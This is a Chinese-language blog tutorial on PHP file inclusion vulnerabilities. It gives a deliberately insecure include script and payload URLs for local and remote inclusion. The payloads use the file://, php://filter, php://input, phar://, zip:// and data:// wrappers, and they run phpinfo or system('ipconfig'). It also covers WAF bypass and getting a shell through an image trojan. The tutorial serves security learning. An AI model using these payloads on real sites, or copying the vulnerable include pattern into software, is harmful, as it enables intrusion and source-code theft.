文件包含漏洞

0x00前言在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。0x01 文件包含漏洞在php当中的文件包含的内容都会被当作php

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

 0x00  前言

在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。

0x01 文件包含漏洞

在php当中的文件包含的内容都会被当作php来执行,文件包含本来是个很常见的语法,在一些cms或者是网站源码里面都可以经常看到会包含到一个数据库文件用于连接数据库。直接的去包含一个文件是安全的,但一些开发人员为了灵活方便,去 动态的去包含一个文件的时候就造成了这么一个漏洞。

文件包含函数如下:

include()
include_once()
require()
require_once()

 

下面来编写一个简单的文件包含脚本

<?php $file = $_GET['file'];
include $file;
?>

 

这里get的方式接收file传参过来的内容,然后包含file传参过来的内容。

那么这时候我们如果上传了一个照片马的话,可以直接调用包含来包含我们的照片马,达到getshell的目的。


文件包含漏洞

这里包含了个txt文件,里面的内容直接被当作代码来执行了。

在文件包含当中也分为本地文件包含(LFI)和远程文件包含(RFI)

两者的区别在于本地文件包含只能包含本地的文件,需要上传图片马到对方服务器上,而远程文件包含可以直接调用远程的文件进行包含。但是远程文件包含的条件是:

allow_url_fopen = On    (默认开启)allow_url_include = On  (默认关闭)被包含的变量前没有目录的限制

文件包含漏洞

开启后能直接包含到远程的文件。

协议也可以直接包含文件,


文件包含漏洞

这里直接包含了一个c盘下的1.txt文件内容就可以被我们给显示出来了。

0x02 文件包含伪协议

文件包含的伪协议有如下:

file://    访问本地文件系统
http://    访问 HTTPs 网址
ftp://     访问 ftp URL
Php://     访问输入输出流
Zlib://    压缩流
Data:
//
Ssh2:// security shell2 Expect:// 处理交互式的流 Glob:// 查找匹配的文件路径 phar:// PHP 归档

 

file伪协议读取本地文件:

http://localhost/include/include.php?file=file://c:\1.txt

 

这里需要写入绝对路径 否则包含不了。

php伪协议利用:

php://伪协议主要分为input 和 filter,input 的利用条件是开启allow_url_include,而filter不需要。

http://127.0.0.1/include/include.php?file=php://filter/resource=../test/1.txt

 

使用文件包含读取源码

php://filter/read=convert.base64-encode/resource=include.php

 

这里使用base64加密后读取文件,如果直接读取php文件会失败,或者直接被执行。

php://input使用条件:

allow_url_include   为on

 

http://127.0.0.1/include/include.php?file=php://input

 

post传入数据

<?php system('ipconfig');?>

 


文件包含漏洞

phar://伪协议利用:

利用条件: php版本大于5.3

http://127.0.0.1/include/include.php?file=phar://phpinfo.rar/phpinfo.txt

 

这个方法在绕过一些waf上有一定的作用

zip://伪协议利用:

http://127.0.0.1/include/include.php?file=zip://phpinfo.rar%23phpinfo.txt

 

这里和前面的不同需要用到个#号

data://伪协议利用:

利用条件:

 
http://127.0.0.1/include/include.php?file=data://test/plain,<?php phpinfo();?>

 

这里还可以传入base64的值 有一直概率的绕过waf的拦截

http://127.0.0.1/include/include.php?file=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

 

  

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119967.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • Java中HashMap遍历几种方式[通俗易懂]

    Java中HashMap遍历几种方式[通俗易懂]目录一、使用迭代器二、foreach遍历一、使用迭代器第一种:  Mapmap=newHashMap();  Iteratoriter=map.entrySet().iterator();  while(iter.hasNext()){  Map.Entryentry=(Map.Entry)iter.next();  Objectkey…

    2022年9月10日
    2
  • 搭建Android开发环境(超详细)

    搭建Android开发环境(超详细)文章转自:http://www.cnblogs.com/xdp-gacl/p/4322165.html搭建最新版本的Android开发环境  最近由于工作中要负责开发一款Android的App,之前都是做JavaWeb的开发,Android开发虽然有所了解,但是一直没有搭建开发环境去学习,Android的更新速度比较快了,Android1.0是2008年发布的,截止到目前为止And

    2022年7月23日
    5
  • 撸完之后

    撸完之后坚持了一周的加班,今天终于告一段落了,回家自己亲手做了一顿饭,吃完之后,开始无聊的无聊。

    2022年8月22日
    5
  • Spring AOP 切面@Around注解的具体使用

    Spring AOP 切面@Around注解的具体使用@Around注解可以用来在调用一个具体方法前和调用后来完成一些具体的任务。比如我们想在执行controller中方法前打印出请求参数,并在方法执行结束后来打印出响应值,这个时候,我们就可以借助于@Around注解来实现;再比如我们想在执行方法时动态修改参数值等类似功能的注解还有@Before等等,用到了SpringAOP切面思想,SpringAOP常用于拦截器、事务、日志、权限验…

    2022年7月15日
    40
  • C6000软件优化经验总结

    C6000软件优化经验总结DSP 优化心得 1推荐C6XX优化经验总结一、c6x的编译的常用选项(一)c6x的编译程序为“cl6x.ex

    2022年6月24日
    28
  • VC++6.0版本号程序转成VS2010版「建议收藏」

    VC++6.0版本号程序转成VS2010版

    2022年1月20日
    42

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号